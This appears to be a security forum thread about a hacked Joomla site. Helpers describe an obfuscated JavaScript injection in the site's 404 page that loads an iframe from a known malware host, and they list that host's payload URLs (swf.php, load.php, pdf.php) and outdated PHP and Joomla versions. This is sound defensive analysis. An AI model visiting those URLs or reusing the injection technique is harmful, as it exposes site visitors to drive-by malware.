JS:ScriptUE in hxxp://www.erlotelebista.com

Viruses and worms
1

Hello,
our site hxxp://www.erlotelebista.com/

the Avast is still showing it as containing a URL:Mal , is it a blacklist of Avast?

Not other Antivirus are detecting anything now. Also this is proof of the lack of any infection right now.

Thanks in advance.

2

Your site appears to have been hacked there is no favicon or hacked favicon.ico file and there is a call for that which generates a 404 error page which has most certainly hacked, http://www.virustotal.com/file-scan/report.html?id=df15fc444d130b29c31f1a48d382f3f2072b84668b4d5976deb98aef8e82cdd3-1307985672.

Other image files also appear to have been hacked.

3

Hi acx,

Those that visit the site will get a avast Web Shield warning for JS:ScriptUE-inf[Trj] in -htxp://etc… logo.png
The site was hacked via a vulnerability, web admins should check theirr PHP and Joomla website application software for updates:
parts of the code could be still in Joomla 1.5.18 and not 1.5.21

PHP version is PHP/5.1.6, version open to some recent by-pass vulnerabilities, 3 known to sofware developer,

polonus

P.S. Code attached could be replaced to make the webpage more IE friendly…
this because the site runs Apache…
see: http://wepawet.iseclab.org/view.php?hash=e1667a2bc5725a999462548a2981bb71&t=1307997764&type=js

D

4

Just for more information, the script that David has pointed out, contained in the hacked 404 page, deobfuscates to an iframe, pointing to a site that is known for malware:

http://hosts-file.net/?s=213.182.197.42&view=matches

Interesting to note, the difference in detection at VT:
http://www.virustotal.com/file-scan/report.html?id=7ecef262a30618ec1b38b9b56931f35a059b9b0591b342a5f208fd75185394a3-1307997688
This is the iframe in my image as it is in a text file.
Seems detection is better on the obfuscation than the content?

(Though I imagine that VT overlooks some elements of the scanning…)

5

Hi spg SCOTT,

Thank you for that additional information but most of the malware that resided there with no response now, so dead, it had two unknown executables and an some EXP/Pidief.W malware.
in resp.

-http://213.182.197.42/swf.php,
-http://213.182.197.42/load.php,
-http://213.182.197.42/pdf.php

also see: http://www.spamhaus.org/sbl/sbl.lasso?query=SBL75831

polonus

6

Hello,

How can I find where is the malware?

Thanks a lot

7

Click the images to expand they will show some of the images, etc. that I had alerts on.

The fact that they appear to have the same insertion point, failed loading of those images resulting in the 404 error page which has been hacked with the insertion of an obfuscated javascript document.write above the opening tag.